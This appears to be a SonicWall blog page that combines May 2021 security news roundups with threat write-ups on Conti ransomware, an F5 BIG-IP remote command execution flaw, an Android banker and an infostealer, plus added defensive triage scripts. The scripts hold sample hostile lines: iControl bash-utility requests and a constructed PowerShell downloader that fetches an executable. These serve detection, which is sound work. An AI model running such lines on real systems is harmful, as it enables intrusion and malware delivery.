
Cybersecurity News & Trends – 05-27-21

This week, healthcare was under attack in the U.S. and abroad, as facilities reported outages and blackmail demands.


SonicWall in the News

Discord is now the young hacker’s weapon of choice — here’s why — Tom’s Guide
“Discord is the potential future of the dark net,” said Brook Chelmo, a senior strategist for SonicWall, during his recent RSA session.

Fish out the Phishing attacks — Security Middle East & Africa
“The best defense against most credential harvesting attacks is the use of a password manager,” SonicWall’s Mohamed Abdallah said. “Most are free, and none can be fooled into entering a password into a malicious site, no matter how authentic it seems.”


Industry News

As Chips Shrink, Rowhammer Attacks Get Harder to Stop — Ars Technica
A full fix for the “Half-Double” technique will require rethinking how memory semiconductors are designed.

Rise in Opportunistic Hacks and Info-Sharing Imperil Industrial Networks — Dark Reading
Security researchers have seen an increasing wave of relatively simplistic attacks involving ICS systems (and attackers sharing their finds with one another) since 2020.

Alleged North Korean hackers scouted crypto exchange employees before stealing currency — Cyberscoop
Suspected North Korean hackers have breached cryptocurrency exchanges in Japan, Europe, the U.S. and Israel in an effort to steal millions of dollars from the platforms in the last three years.

Ransomware: Two-thirds of organisations say they’ll take action to boost their defences — ZDNet
The impact of the Colonial Pipeline ransomware attack is leading companies to re-examine their cybersecurity strategies.

New Zealand Hospitals Under Prolonged IT Outage From Ransom Hack — Bloomberg
Systems are still down a week after a ransomware attack disrupted the IT network of five hospitals in the New Zealand district of Waikato, and concerns remain that private patient information may have been exposed.

Iranian hacking group targets Israel with wiper disguised as ransomware — Bleeping Computer
An Iranian hacking group has been observed camouflaging destructive attacks against Israeli targets as ransomware attacks. Meanwhile, they’re maintaining access to victims’ networks for months.

Gartner: Global Security Spending Will Reach $150 Billion in 2021 — Security Week
Gartner says nearly half (roughly $72 billion) will be spent on security services, including consulting, hardware support, and implementation and outsourced services.

Hear ye, DarkSide! This honorable ransomware court is now in session — Ars Technica
A crime forum is holding a quasi-judicial proceeding against the makers of DarkSide to hear claims from former affiliates who say the makers skipped town without paying.

FBI identifies 16 Conti ransomware attacks striking US healthcare, first responders — ZDNet
The targets identified include 911 dispatch carriers, law enforcement agencies and emergency medical services — all of which have been attacked over the past year as medical services struggled to manage the pandemic.

Vulnerability in VMware product has severity rating of 9.8 out of 10 — Ars Technica
The security flaw, which VMware disclosed and patched on Tuesday, resides in the vCenter Server, one of the most popular virtualization solutions on the market.

Cyber insurance premiums, take-up rates surge, says GAO — ZDNet
A Government Accountability Office (GAO) report finds that cyber insurance premiums surged in 2020 as cyberattacks became more frequent, a trend that is likely to continue.

Zeppelin ransomware comes back to life with updated versions — Bleeping Computer
The developers of Zeppelin ransomware have resumed activity after a period of relative silence that started last fall.

This massive phishing campaign delivers password-stealing malware disguised as ransomware — ZDNet
Java-based STRRAT malware creates a backdoor into infected machines — but distracts victims by acting like ransomware.

Bizarro banking malware targets 70 banks in Europe and South America — Bleeping Computer
A banking trojan named Bizarro that originates from Brazil has crossed the borders and started to target customers of 70 banks in Europe and South America.

E-commerce giant suffers major data breach in Codecov incident — Bleeping Computer
E-commerce platform Mercari has disclosed a major data breach incident that occurred due to exposure from the Codecov supply-chain attack.

QNAP confirms Qlocker ransomware used HBS backdoor account — Bleeping Computer
QNAP is advising customers to update the HBS 3 disaster recovery app. The goal: to block Qlocker ransomware attacks targeting their Internet-exposed Network Attached Storage (NAS) devices.


In Case You Missed It

Infiltrate, Adapt, Repeat: A Look at Tomorrow’s Malware Landscape — Brook Chelmo
Join us for the 2021 SonicWall Partner Virtual Roadshow — David Bankemper
Capture Client 3.6 Launch Brings Key Features — Brook Chelmo
Using Client VPN with Your Firewall for WFH: a Setup for Disaster? — Jean-Pier Talbot
Triple Threat: CRN’s 2021 Women of the Channel List Honors SonicWall Leaders — Lindsey Lockhart

Conti operator demands $20M from victim. Faces litigation backlash instead

The SonicWall Capture Labs threat research team has recently been tracking Conti ransomware. Conti has been connected with over 400 cyberattacks against organizations around the world. In addition to encrypting files and holding them for ransom, the attackers increase their chances of a payout by threatening to publish sensitive data stolen from the victim’s network. Such double-extortion schemes are a growing trend in ransomware.

Infection Cycle:

Conti ransomware is aimed at large company networks. The initial intrusion is handled manually by the attackers and usually starts with phishing or the exploitation of a vulnerable Internet-facing device such as a firewall. Once inside the network, a Cobalt Strike beacon is introduced to communicate with the attackers’ C2 server. With that backdoor established, the attackers propagate further within the network and exfiltrate sensitive data that will later be used for extortion. Only after this is the Conti encryptor deployed.

Conti malware uses the following icon:

Upon infection, files on the system are encrypted. Each encrypted file is given a .FEEDC extension. A file named readme.txt is dropped into every directory containing encrypted files. It contains the following message:

https://contirecovery.top is down, but the Tor link in the note leads to the following page:

 

After uploading readme.txt to the Tor site, the following conversation can be seen between a prior victim and the operator.

As seen in the message above, the operator demands a staggering $20M for file decryption.

After a few days, the victim fights back with litigation:

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Conti.RSM (Trojan)
  • GAV: Conti.RSM_2 (Trojan)
  • GAV: Conti.RSM_3 (Trojan)
  • GAV: Conti.RSM_4 (Trojan)
  • GAV: Cobaltstrike.A_1 (Trojan)
  • GAV: Cobaltstrike.A_2 (Trojan)
  • GAV: Cobaltstrike.A_3 (Trojan)
  • GAV: Cobaltstrike.A_4 (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.
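
When responding to an intrusion like the one described above, the first question is usually scope: which directories were encrypted, where the notes were dropped, and when the encryptor ran. The script below is an added example written for this write-up, not SonicWall’s or Conti’s code. It works from a (path, mtime) listing so it can be run offline; the listing it ships with is constructed, and the extension and note name are parameters because Conti changes the extension from victim to victim.

```python
"""Scope a Conti-style encryption event from a file listing.

Added example, not SonicWall's code. Given (path, mtime) pairs it counts
encrypted files per directory, locates ransom notes, lists directories
that hold encrypted files but no note (a sign the encryptor was stopped
part-way), and takes the earliest/latest encrypted-file timestamps as the
encryption window. The listing below is constructed for illustration; the
extension and note name are parameters because Conti varies the extension
per victim.
"""
import os
from collections import defaultdict
from datetime import datetime, timezone

RANSOM_EXT = ".FEEDC"       # extension seen in this sample
RANSOM_NOTE = "readme.txt"  # note dropped into directories with encrypted files

# Constructed listing of (path, POSIX mtime); not from a real incident.
SAMPLE_LISTING = [
    ("C:/Finance/2021/q1.xlsx.FEEDC", 1621420800),
    ("C:/Finance/2021/q2.xlsx.FEEDC", 1621420805),
    ("C:/Finance/2021/readme.txt", 1621420806),
    ("C:/Finance/budget.docx.FEEDC", 1621420809),
    ("C:/Finance/readme.txt", 1621420810),
    ("C:/Shares/hr/payroll.csv.FEEDC", 1621420811),
    ("C:/Users/alice/notes.txt", 1621300000),
    ("C:/Windows/System32/kernel32.dll", 1600000000),
]


def _split(path):
    """(directory, file name) for a forward-slash path."""
    head, _, name = path.rpartition("/")
    return head, name


def listing_from_tree(root):
    """Build a (path, mtime) listing from a real tree; read-only, skips errors."""
    out = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                out.append((full.replace(os.sep, "/"), int(os.stat(full).st_mtime)))
            except OSError:
                continue
    return out


def scope_encryption(listing, ext=RANSOM_EXT, note=RANSOM_NOTE):
    """Summarise an encryption event from a (path, mtime) listing."""
    counts = defaultdict(int)
    note_dirs = set()
    stamps = []
    for path, mtime in listing:
        d, name = _split(path)
        lname = name.lower()
        if lname.endswith(ext.lower()):
            counts[d] += 1
            stamps.append(mtime)
        elif lname == note.lower():
            note_dirs.add(d)
    to_iso = lambda t: datetime.fromtimestamp(t, timezone.utc).isoformat()
    return {
        "encrypted_files": sum(counts.values()),
        "per_directory": dict(counts),
        "note_dirs": sorted(note_dirs),
        "encrypted_without_note": sorted(set(counts) - note_dirs),
        "first_encrypted": to_iso(min(stamps)) if stamps else None,
        "last_encrypted": to_iso(max(stamps)) if stamps else None,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(scope_encryption(SAMPLE_LISTING), indent=2))
```

On a live host, pass `listing_from_tree("C:/")` (or a mounted image) to `scope_encryption`. The encryption window is only as good as the file system timestamps, so compare it against EDR or event-log evidence of the Cobalt Strike beacon before relying on it for the timeline.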

F5 BIG-IP iControl remote command execution vulnerability

The SonicWall Capture Labs threat research team has observed attacks exploiting a vulnerability in F5’s BIG-IP iControl REST API.

BIG-IP

F5’s BIG-IP is a product family consisting of software, hardware, and virtual appliances designed around application availability, access control, and security. BIG-IP software products run on top of F5’s Traffic Management Operating System (TMOS), designed specifically to inspect network and application traffic and make real-time decisions based on the configuration given. The BIG-IP Configuration Utility is a web GUI that F5 users use to set up the BIG-IP product and make additional changes.

Vulnerability | CVE-2021-22986
BIG-IP iControl is a REST API for BIG-IP, which is accessible over HTTPS on port 443/TCP via the following URL:

https://<host>/mgmt/tm/

The BIG-IP iControl REST interface has an unauthenticated remote command execution vulnerability. It allows unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services. The vulnerability can only be exploited through the control plane; there is no data plane exposure. Exploitation can lead to complete system compromise. A remote attacker exploits it by sending a specially crafted request to the REST interface: because login requests to the REST API are insufficiently validated, the attacker is able to bypass authentication.

After bypassing authentication, a remote attacker can use multiple vectors to execute commands on the target server, as shown below:

The following JSON payload would execute the “id” command on the underlying operating system:

The following versions are vulnerable:

    • 16.0.x before 16.0.1.1
    • 15.1.x before 15.1.2.1
    • 14.1.x before 14.1.4
    • 13.1.x before 13.1.3.6
    • 12.1.x before 12.1.5.3
    • BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2
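
Two checks a defender can run against the information above, as an added example (not F5’s or SonicWall’s code): a version comparison against the affected ranges listed, and a triage of iControl REST requests from an access log that flags /mgmt/ calls from hosts outside a management allowlist and any call to the bash utility endpoint. The `/mgmt/tm/util/bash` path and its `utilCmdArgs` field are F5’s documented iControl REST utility API rather than something taken from this page; the log format, the allowlist and the addresses are constructed for illustration.

```python
"""Exposure checks for CVE-2021-22986 (BIG-IP iControl REST).

Added example, not F5's or SonicWall's code. Two offline checks:
(1) compare a BIG-IP/BIG-IQ version string against the affected ranges
listed above, and (2) triage iControl REST requests from an access log,
flagging /mgmt/ calls from hosts outside a management allowlist and calls
to the bash utility endpoint. The /mgmt/tm/util/bash path and its
utilCmdArgs field are F5's documented iControl REST utility API, not
taken from this page; the log format, allowlist and addresses are
constructed for illustration.
"""
import json
import re

# Product -> affected branch -> first fixed version, from the list above.
FIXED_VERSIONS = {
    "BIG-IP": {(16, 0): "16.0.1.1", (15, 1): "15.1.2.1", (14, 1): "14.1.4",
               (13, 1): "13.1.3.6", (12, 1): "12.1.5.3"},
    "BIG-IQ": {(7, 1, 0): "7.1.0.3", (7, 0, 0): "7.0.0.2"},
}


def parse_version(v):
    return tuple(int(x) for x in v.strip().split("."))


def is_vulnerable(version, product="BIG-IP"):
    """True if version is in an affected branch and older than the fix.

    Returns None for branches not named in the list above so the caller can
    tell "not listed" apart from "patched".
    """
    parts = parse_version(version)
    for branch, fixed in FIXED_VERSIONS[product].items():
        if parts[:len(branch)] == branch:
            return parts < parse_version(fixed)
    return None


# Hosts allowed to reach the management plane (constructed allowlist).
MGMT_ALLOWLIST = {"10.0.0.5", "10.0.0.6"}
BASH_UTIL = re.compile(r"^/mgmt/tm/util/bash(?:/|$|\?)")

# Constructed access-log lines: "<src> <method> <path> <body-or-dash>".
SAMPLE_LOG = """\
10.0.0.5 GET /mgmt/tm/sys/version -
203.0.113.9 POST /mgmt/tm/util/bash {"command":"run","utilCmdArgs":"-c whoami"}
10.0.0.6 POST /mgmt/tm/util/bash {"command":"run","utilCmdArgs":"-c ls /config"}
198.51.100.4 GET /mgmt/tm/ltm/virtual -
10.0.0.5 GET /tmui/login.jsp -
"""


def triage_icontrol_log(text, allowlist=MGMT_ALLOWLIST):
    """Return one finding per suspicious iControl REST request."""
    findings = []
    for line in text.splitlines():
        src, method, path, body = line.split(" ", 3)
        if not path.startswith("/mgmt/"):
            continue  # not the REST API; out of scope here
        reasons = []
        if src not in allowlist:
            reasons.append("management request from non-allowlisted source")
        if BASH_UTIL.match(path):
            try:
                parsed = json.loads(body)
            except ValueError:
                parsed = {}
            args = parsed.get("utilCmdArgs") if isinstance(parsed, dict) else None
            reasons.append("bash utility call: %s" % args)
        if reasons:
            findings.append({"src": src, "method": method, "path": path,
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for v in ("16.0.1.0", "16.0.1.1", "14.1.3.1", "11.6.5"):
        print(v, is_vulnerable(v))
    for f in triage_icontrol_log(SAMPLE_LOG):
        print(f)
```

The version check returns None for branches the list does not name, so a result of None means “check the advisory”, not “safe”. The log triage flags every bash utility call, including ones from allowlisted hosts, because that endpoint runs shell commands as root on the appliance and should be rare in legitimate automation.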

This vulnerability has been patched; the vendor has published an advisory.

SonicWall Capture Labs provides protection against this threat via the following signatures:

    • IPS 15471:F5 BIG-IP iControl REST Remote Command Execution 1
    • IPS 15472:F5 BIG-IP iControl REST Remote Command Execution 2
    • IPS 15473:F5 BIG-IP iControl REST Remote Command Execution 3

Threat Graph

Android banker with hardcoded financial targets

The SonicWall Threats Research Team received reports of an Android banker campaign with a multitude of features and commands at its disposal. The samples we analyzed contain a hardcoded list of financial institutions; the malware monitors for their apps and shows fake login pages when a targeted app is found running on the device.

Sample Details

  • MD5:  9d050ee9d306fa2228b3ddb1840bfb61
  • Application Name: OLX
  • Package Name: man.cube.ship

Infection Cycle

Among the permissions requested, the following are a few sensitive/dangerous ones:

  • android.permission.BIND_ACCESSIBILITY_SERVICE
  • android.permission.CALL_PHONE
  • android.permission.GET_TASKS
  • android.permission.READ_SMS
  • android.permission.REAL_GET_TASKS
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.RECEIVE_SMS
  • android.permission.SEND_SMS
  • android.permission.SYSTEM_ALERT_WINDOW
  • android.permission.WRITE_SETTINGS

 

Upon installation and execution, the malware does not show any screen or interface of any kind, but continues to perform malicious actions in the background:

The manifest (AndroidManifest.xml) points to a Main Activity class that is invoked when the application runs, but this class is not seen in the code base once the APK is decompiled:

This suggests that a DEX file containing the actual, de-obfuscated code is dropped when the application executes. We observed a file being dropped into the app_DynamicOptDex folder of the app’s data directory on the device. The file ZTpqTR.json is actually a DEX file that contains legible malicious code.
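
A dropped DEX can be found by content rather than by name, since every DEX file starts with the 8-byte magic `dex\n<3-digit version>\0`. The script below is an added example, not SonicWall’s code: it picks out DEX files hiding behind other extensions in a sandbox listing and maps the permissions listed above to the abuse they enable. The file contents, paths and permission list are constructed for illustration; the package name is the one reported above.

```python
"""Find a DEX payload hiding behind a non-.dex name and triage permissions.

Added example, not SonicWall's code. Android DEX files begin with the
8-byte magic "dex\\n<3-digit version>\\0", so a dropped file can be
recognised by content even when it is named ZTpqTR.json as in the sample
above. The file contents, paths and permission list below are constructed
for illustration; the package name is the one reported above.
"""
import re

DEX_MAGIC = re.compile(rb"^dex\n\d{3}\x00")


def is_dex(head):
    """True if the first bytes carry a DEX header, whatever the name says."""
    return DEX_MAGIC.match(head[:8]) is not None


def find_hidden_dex(files):
    """files: {path: first bytes}. Returns paths that are DEX by content but
    do not use a .dex extension (the disguise used by this dropper)."""
    return sorted(p for p, head in files.items()
                  if is_dex(head) and not p.lower().endswith(".dex"))


# Permissions singled out above, with the abuse they enable in a banker.
RISKY_PERMISSIONS = {
    "android.permission.BIND_ACCESSIBILITY_SERVICE": "automate and read other apps' UI",
    "android.permission.SYSTEM_ALERT_WINDOW": "draw fake login pages over banking apps",
    "android.permission.READ_SMS": "read SMS one-time codes",
    "android.permission.RECEIVE_SMS": "intercept SMS one-time codes",
    "android.permission.SEND_SMS": "send SMS without the user (send_sms command)",
    "android.permission.CALL_PHONE": "place calls (call_number command)",
    "android.permission.GET_TASKS": "see which app is in the foreground",
    "android.permission.REAL_GET_TASKS": "see which app is in the foreground",
    "android.permission.RECEIVE_BOOT_COMPLETED": "restart after reboot",
    "android.permission.WRITE_SETTINGS": "change device settings",
}


def flag_permissions(requested):
    """Map each risky permission present in `requested` to why it matters."""
    return {p: RISKY_PERMISSIONS[p] for p in requested if p in RISKY_PERMISSIONS}


# Constructed sandbox listing: path -> first 16 bytes of the file.
SAMPLE_FILES = {
    "/data/data/man.cube.ship/app_DynamicOptDex/ZTpqTR.json": b"dex\n035\x00" + b"\x00" * 8,
    "/data/data/man.cube.ship/shared_prefs/cfg.xml": b'<?xml version="1',
    "/data/data/man.cube.ship/files/notes.json": b'{"k":"v"}',
    "/data/app/man.cube.ship/base.apk": b"PK\x03\x04" + b"\x00" * 12,
}

SAMPLE_PERMISSIONS = [
    "android.permission.INTERNET",
    "android.permission.READ_SMS",
    "android.permission.SYSTEM_ALERT_WINDOW",
    "android.permission.BIND_ACCESSIBILITY_SERVICE",
]

if __name__ == "__main__":
    print(find_hidden_dex(SAMPLE_FILES))
    for perm, why in flag_permissions(SAMPLE_PERMISSIONS).items():
        print(perm, "->", why)
```

The magic check deliberately ignores the extension and looks only at the header, so it also catches payloads renamed to .png or .db; a dropper that additionally encrypts its payload will defeat it and has to be caught at the point where the decrypted file is written.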

Observations from the code

Interesting elements are present in a class file that can be considered the configuration file, as it contains a number of hardcoded elements:

Server that the malware communicates with:

  • http://ro-37[.]in/myaccount/login[.]php

A number of domains marked as Gates:

  • http://analkarnavalbubenec[.]pw/3lfk3jGj/
  • http://karambga3j[.]net/3lfk3jGj/
  • http://lkrishtian1[.]com/3lfk3jGj/
  • http://lkrishtifaa[.]com/3lfk3jGj/

A list of financial applications that the malware targets, along with what look like fake login pages hosted on a domain (which has been taken down as of this writing); the complete list can be viewed here.

 

The malware has capabilities to accept the following commands and execute the corresponding functionalities:

  • registration
  • send_sms
  • sms_contact
  • sms_contacts
  • get_push
  • tracker
  • move_sms_client
  • mard_mode (apparently a misspelling of hard_mode)
  • call_number
  • startes_access

 

Network activity

The malware communicated with the following domains during our analysis:

  • ro-27[.]in
  • lkrishtifaa[.]com

 

The following VirusTotal graph can be seen for this APK:

 

Banker Targets

The malware targets a number of financial institutions, notable targets include:

  • AlfaBank – Commercial bank in Russia
  • OpenBank – An online bank, headquartered in Madrid
  • Tinkoff – Russian bank based in Moscow
  • VTB24 – Leading universal bank of Russia
  • Mbank – Banking group in Poland
  • HomeCredit – An international non-bank financial institution headquartered in Netherlands

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • AndroidOS.Banker.DR_1

 

Indicators of compromise (IOC):

  • 9d050ee9d306fa2228b3ddb1840bfb61

Cybersecurity News & Trends – 05-21-21

This week the DarkSide ransomware group dominated the headlines, launching additional attacks, bringing in large quantities of Bitcoin and (hopefully) being shut down for good.


SonicWall in the News

‘It’s a battle, it’s warfare’: experts seek to defeat ransomware attackers — Financial Times

  • Financial Times reporter Hannah Murphy references SonicWall data as she explores the lucrative industry of ransomware.

Breaking into New Technology with Partners — Channel Pro Network

  • MiradorIT cites its partnership with ASCII member Net Sciences for enabling it “to move into advanced cybersecurity by offering high-availability SonicWall deployments.”

Windows 10 has a built-in ransomware block, you just need to enable it — PC Gamer

  • Turns out there is a mechanism in Windows Defender that can help protect your files from ransomware. PC Gamer leverages SonicWall data to educate readers.
    *Syndicated: PC Gamer – UK

D&H Defies Pandemic: Grows U.S. Sales 19 Percent, Breaks $5B Barrier — CRN

  • D&H Distributing, the 104-year-old, employee-owned SMB distribution stalwart, helped its partners power through the global pandemic — and in the process, posted a whopping 160% increase in cloud sales for the fiscal year.

Industry News

The Full Story of the Stunning RSA Hack Can Finally Be Told — Wired

  • In 2011, Chinese spies stole the crown jewels of cybersecurity — stripping protections from firms and government agencies worldwide.

Denial of Electricity Service Could Become Next Geopolitical Weapon — The Wall Street Journal

  • With electricity expected to account for a large share of the world’s energy use by 2050, the stakes are high.

Colonial Pipeline CEO: Paying DarkSide ransom was the ‘right thing to do for the country’ — ZDNet

  • The chief executive of Colonial Pipeline has defended paying cybercriminals who launched a devastating attack on the company, calling it the “right thing to do for the country.”

School districts struggle to defend against rising ransomware attacks — The Hill

  • Cybercriminals are stepping up their efforts to hack into vulnerable school districts, often launching ransomware attacks like the kind that shut down Colonial Pipeline earlier this month.

Bizarro banking Trojan surges across Europe — ZDNet

  • Operators have targeted customers of at least 70 banks across Europe and South America so far.

Chemical distributor pays $4.4 million to DarkSide ransomware — Bleeping Computer

  • Chemical distribution company Brenntag paid a $4.4 million ransom to the DarkSide ransomware gang to receive a decryptor for encrypted files and prevent the threat actors from publicly leaking stolen data.

Legislation to secure critical systems against cyberattacks moves forward in the House — The Hill

  • Multiple bills meant to secure critical infrastructure against cyberthreats were approved by the House Homeland Security Committee — just a week after a ransomware attack on the Colonial Pipeline caused fuel shortages across the nation.

New Zealand hospitals infected by ransomware, cancel some surgeries — The Register

  • New Zealand’s Waikato District Health Board has been hit with ransomware that took down most IT services and drastically reduced services at six of its affiliate hospitals.

Hackers scan for vulnerable devices minutes after bug disclosure — Bleeping Computer

  • Every hour, a threat actor starts a new scan on the public web for vulnerable systems, moving at a quicker pace than global enterprises when trying to identify serious vulnerabilities on their networks.

Supply chain hacking attacks: Government eyes new rules to tighten security — ZDNet

  • The UK might soon require managed IT service providers to undergo extra cybersecurity checks.

‘Catastrophic’ cyberattack larger than pipeline hack increasingly likely, acting CISA chief says — The Washington Times

  • A top U.S government official said it is increasingly likely the federal government will be faced with a “catastrophic cyber incident” larger in scope than the recent Colonial Pipeline hack.

After just 9 months, Darkside ransomware gang brings in $90 million in Bitcoin — ZDNet

  • The cryptocurrency was sourced from 47 different wallets, according to research from Elliptic.

Insurer AXA hit by ransomware after dropping support for ransom payments — Bleeping Computer

  • Branches of insurance giant AXA based in Thailand, Malaysia, Hong Kong and the Philippines have been struck by a ransomware cyberattack, with 3 TB of sensitive data stolen from AXA’s Asian operations.

DarkSide ransomware servers reportedly seized, REvil restricts targets — Bleeping Computer

  • The DarkSide ransomware operation has allegedly shut down, after the threat actors lost access to servers and their cryptocurrency was transferred to an unknown wallet.

Toshiba unit struck by DarkSide ransomware group — ZDNet

  • Following Colonial Pipeline, a DarkSide affiliate has claimed another victim.

In Case You Missed It

Multistage infostealer wants your Discord, Telegram, Steam Account Info

The SonicWall Capture Labs Threat Research team has analyzed a multi-stage infostealer. Where present on the victim’s machine, this Trojan steals cryptocurrency wallet data, credit card information, FTP server credentials, and account data for Discord, Telegram, Pidgin, Steam, NordVPN and Authy (2FA). It also steals the browser history and takes a screenshot of the desktop.

Infection Cycle:

The infection starts with a malicious Microsoft Excel spreadsheet containing an embedded Visual Basic for Applications (VBA) macro that, when executed, downloads a Trojan downloader.

The downloader then drops a batch file that runs a series of commands.

The batch file has functionality to add a user to Active Directory.

It also invokes PowerShell to run a script that downloads the main infostealer Trojan. The PowerShell script is encoded; decoding it reveals the download URL.

To ensure persistence, it adds the infostealer Trojan to startup.

All of these component files are deleted once the main infostealer has been downloaded.
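
The encoded PowerShell stage is the quickest place to recover the download URL during triage. PowerShell’s -EncodedCommand (also accepted as -enc, -ec or -e) carries the script as base64 over UTF-16LE text, so a few lines of Python decode it and extract any URLs. This is an added example, not SonicWall’s code or the malware’s; the command line it analyzes is constructed, and 198.51.100.7 is a documentation address rather than a real download server.

```python
"""Decode a PowerShell -EncodedCommand argument and pull out download URLs.

Added example, not SonicWall's code. PowerShell's -EncodedCommand (also
-enc, -ec, -e) takes the script as base64 over UTF-16LE text, so decoding
it is the quickest way to recover the download URL the write-up mentions.
The command line below is constructed for illustration; 198.51.100.7 is a
documentation address, not a real download server.
"""
import base64
import re

URL_RE = re.compile(r"(?:https?|ftp)://[^\s'\"<>()]+", re.IGNORECASE)
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_command(script):
    """Base64(UTF-16LE) form PowerShell expects; used here to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64):
    """Inverse of encode_command; raises ValueError on malformed input."""
    raw = base64.b64decode(b64, validate=True)
    if len(raw) % 2:
        raise ValueError("UTF-16LE payload has odd length")
    return raw.decode("utf-16-le")


def extract_urls(text):
    return URL_RE.findall(text)


def analyze_cmdline(cmdline):
    """Find an encoded-command argument, decode it and list the URLs in it."""
    m = ENC_RE.search(cmdline)
    if not m:
        return {"encoded": False, "script": None, "urls": extract_urls(cmdline)}
    script = decode_encoded_command(m.group(1))
    return {"encoded": True, "script": script, "urls": extract_urls(script)}


# Constructed downloader script of the kind a batch file hands to powershell.exe.
SAMPLE_SCRIPT = ("$u='http://198.51.100.7/collector.exe';"
                 "$p=Join-Path $env:TEMP 'svc.exe';"
                 "(New-Object Net.WebClient).DownloadFile($u,$p)")
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(analyze_cmdline(SAMPLE_CMDLINE))
```

Feed `analyze_cmdline` the CommandLine field from Sysmon event 1 or Windows event 4688. Note that a malicious script can also be hidden as a string the script itself decodes (FromBase64String, compressed streams), so a decoded script with no URL is not necessarily clean.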

Once executed, the main infostealer creates a directory with a random name under the %Temp% folder, where it logs all stolen information.

It creates an SQLite file holding the credit card information found on the system.

It saves a PNG screenshot of the victim’s desktop.

It also creates a file listing all recently visited websites, and another file holding the rest of the stolen information: cryptocurrency wallets, chat applications such as Discord, Pidgin and Telegram, VPN and FTP credentials, and account data for the Steam gaming platform.

All of these log files are deleted once they have been sent to the remote server.

During analysis we noted that the logs were titled “Collector Project” and marked BETA BUILD v1.11, which suggests this is an ongoing project for these cybercriminals and that we can expect to see further variants with more features and capabilities.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Panda.B (Trojan)
  • GAV: Panda.K (Trojan)
  • GAV: Panda.STL (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

Cybersecurity News & Trends – 05-14-21

This week attackers once again turned their attention to local government, resulting in several cities and municipal police departments reporting breaches.


SonicWall in the News

Raab set to reveal aggressive cyber-attacks targeting 80 UK schools and Universities in March — UK Tech News

  • Foreign Secretary Dominic Raab alerted the Cyber UK conference that 80 British schools and universities were hit by ransomware attacks in March, forcing them to delay reopening.
    *Syndicated: Info Security Buzz

Working from home is making companies rethink IT spending. Here’s how it’s changing — TechRepublic

  • Businesses are prioritizing their IT spending to focus on tech investments that support a ‘hybrid’ mix of working at home and in the office, according to new research.

Deep Dive: Terry Greer-King, VP EMEA, SonicWall — Intelligent CISO

  • Terry Greer-King, SonicWall VP EMEA, highlights SonicWall’s Boundless Security and how it uses automated threat detection and response to help organizations protect themselves.
    *Syndicated: Intelligent CIO – EU; Intelligent CIO – Africa

We regret ‘creating problems’, say Colonial petroleum pipeline hackers — Financial Times

  • The DarkSide ransomware group has stated it is apolitical and only wanted to make money, according to the Financial Times

Catch Of The Week: Ransomware Shuts Down U.S. Pipeline — Los Alamos Daily Post

  • Colonial Pipeline, one of the top U.S. fuel pipeline operators, shut down its entire network after a ransomware attack, affecting nearly half of the East Coast’s fuel supply.

The basics of backup: How to avoid disaster — Intelligent CISO

  • As the amount of data in existence surges, business leaders must ensure they have the correct processes in place to manage it and avoid data loss.

Industry News

After Colonial Pipeline hack, lawmakers want more action on pipeline security — Cyberscoop

  • A two-year-old federal pipeline initiative has shown promise, but more needs to be done, lawmakers say.

Despite Heightened Breach Fears, Incident Response Capabilities Lag — Dark Reading

  • Many organizations remain unprepared to detect, respond to and contain a breach, a new survey shows.

Biden signs executive order to improve federal cybersecurity — The Hill

  • President Biden signed an executive order aimed at improving federal cybersecurity on the heels of multiple major and damaging cyberattacks, including the one on the Colonial Pipeline.

Global cybersecurity leaders say they feel unprepared for attack: report — The Hill

  • A majority of global CISOs surveyed said they feel their organizations are unprepared to face a cyberattack, despite many believing they will face an attack in the next year.

South Korea orders urgent review of energy infrastructure cybersecurity — The Register

  • The review was spurred by the Colonial Pipeline outage, which stressed the fuel supply of the U.S. East Coast.

FBI, CISA publish alert on DarkSide ransomware — ZDNet

  • The advisory deals with ransomware-as-a-service, thrust into the spotlight by the Colonial Pipeline cyberattack.

Ransomware crooks post cops’ psych evaluations after talks with DC police stall — Ars Technica

  • A ransomware gang that hacked the District of Columbia’s Metropolitan Police Department has posted personnel records for almost two dozen officers, including psychological assessments and polygraph tests; driver’s license images; fingerprints; social security numbers; dates of birth; and residential, financial, and marriage histories.

Experts suggest French insurer AXA’s plan to shun ransomware payouts will set a precedent — Cyberscoop

  • While some say they’re surprised it hasn’t happened sooner, others are wondering how long it will take for the rest of the industry to follow suit.

Adobe: Windows Users Hit by PDF Reader Zero-Day — Security Week

  • Adobe on Tuesday warned that a gaping security hole in Adobe Reader, one of the most widely deployed software products, has been exploited in the wild in “limited attacks.”

City of Tulsa’s online services disrupted in ransomware incident — Bleeping Computer

  • The city of Tulsa, Okla., has suffered a ransomware attack that forced the city to shut down its systems to prevent further spread.

City of Chicago Hit by Data Breach at Law Firm Jones Day — Security Week

  • The city of Chicago on Friday said that employee emails were compromised in a Jones Day data breach involving Accellion’s FTA file sharing service.

Ransomware gangs get more aggressive against law enforcement — The Washington Times

  • Criminal hackers are increasingly using brazen methods to increase pressure on law-enforcement agencies to pay ransoms, including leaking or threatening to leak highly sensitive and potentially life-threatening information.

The Colonial Pipeline Hack Is a New Extreme for Ransomware — Wired

  • Profit-focused cybercriminal hackers have inflicted a disruption that military and intelligence agency hackers have never dared to, shutting down a pipeline that carries nearly half the fuel consumed on the East Coast of the United States.

DHS to hire 200 more cyber pros as Biden administration grapples with hacking threats — Cyberscoop

  • It’s part of “the most significant hiring initiative” the department has ever undertaken, according to Alejandro Mayorkas.

In Case You Missed It

Microsoft Security Bulletin Coverage for May 2021

